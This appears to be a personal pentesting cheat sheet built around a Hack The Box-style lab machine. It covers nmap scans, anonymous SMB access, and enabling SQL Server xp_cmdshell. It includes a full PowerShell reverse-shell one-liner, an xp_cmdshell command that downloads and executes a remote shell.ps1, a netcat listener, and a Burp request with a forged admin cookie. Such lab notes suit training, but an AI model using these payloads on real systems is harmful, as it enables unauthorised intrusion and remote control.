Skip to content

Pentesting

RECON

Windows commands

Output the contents of a file

type potato

Show current user

whoami

NMAP

Find TCP ports that are active

ports=$(nmap -p- --min-rate=1000 -T4 $TARGET_IP | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p- --min-rate=1000 -T4 $TARGET_IP -v

Scan the ports that we're found + service detection.

nmap -sC -sV -p$ports $TARGET_IP

laurentdumont@cr300-kali:~$ nmap -sC -sV -p 1433 10.10.10.27
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-12 12:37 EST
Nmap scan report for 10.10.10.27
Host is up (0.034s latency).

PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-11-06T18:53:07
|_Not valid after:  2050-11-06T18:53:07
|_ssl-date: 2020-11-12T18:56:28+00:00; +1h18m29s from scanner time.

Host script results:
|_clock-skew: mean: 1h18m28s, deviation: 0s, median: 1h18m28s
| ms-sql-info: 
|   10.10.10.27:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433

SMB (file sharing)

List Shares

smbclient -N -L \\\\$TARGET_IP\\

Connect to Share

smbclient -N \\\\$TARGET_IP\\backups

Get files from share

laurentdumont@cr300-kali:~$ smbclient -N \\\\10.10.10.27\\backups
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Nov 10 17:21:13 2020
  ..                                  D        0  Tue Nov 10 17:21:13 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 07:23:02 2020
  user.txt                            A       32  Tue Feb 25 09:37:36 2020

                10328063 blocks of size 4096. 7108669 blocks available

smb: \> get user.txt
getting file \user.txt of size 32 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

Using ImpPacket

git clone https://github.com/SecureAuthCorp/impacket
# Move the utility from ./examples into the root folder

# Run the utility
python3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth

# OR INSTALL ALL EXAMPLES (execute in project root folder)
pip3 install .

Microsoft SQL

Check if user is admin

SQL> SELECT IS_SRVROLEMEMBER ('sysadmin')


-----------   

          1   

IF 1 user is admin.

Validate in which context SQL Server is running and enable the 'xp_cmdshell' module.

EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;

EXEC sp_configure 'xp_cmdshell', 1
reconfigure;
xp_cmdshell "whoami"

SQL>  xp_cmdshell "whoami" 
output                                                                             

--------------------------------------------------------------------------------   

archetype\sql_svc                                                                  

NULL

NETCAT (nc)

Create a listener on tcp port 443

sudo nc -lvnp 443

Windows Shell

Attempt to connect to a listener and open a shell using TCP port 443. You need to replace the IP of the machine that is listening (with nc for example)

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.3",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() 

Execute the command on the SQL server. This will attempt to get the shell.ps1 file and execute it in the context of the user running the SQL server.

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.53/shell.ps1\");"

BURP

BURP Intruder Sniper

GET /cdn-cgi/login/admin.php?content=accounts&id=§param1§ HTTP/1.1
Host: 10.10.10.28
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: user=34322; role=admin
Connection: close

Privilege escalation flow

Information gathering

Get OS version

lsb_release -a

Get Kernel version

uname -a

Get current user info

id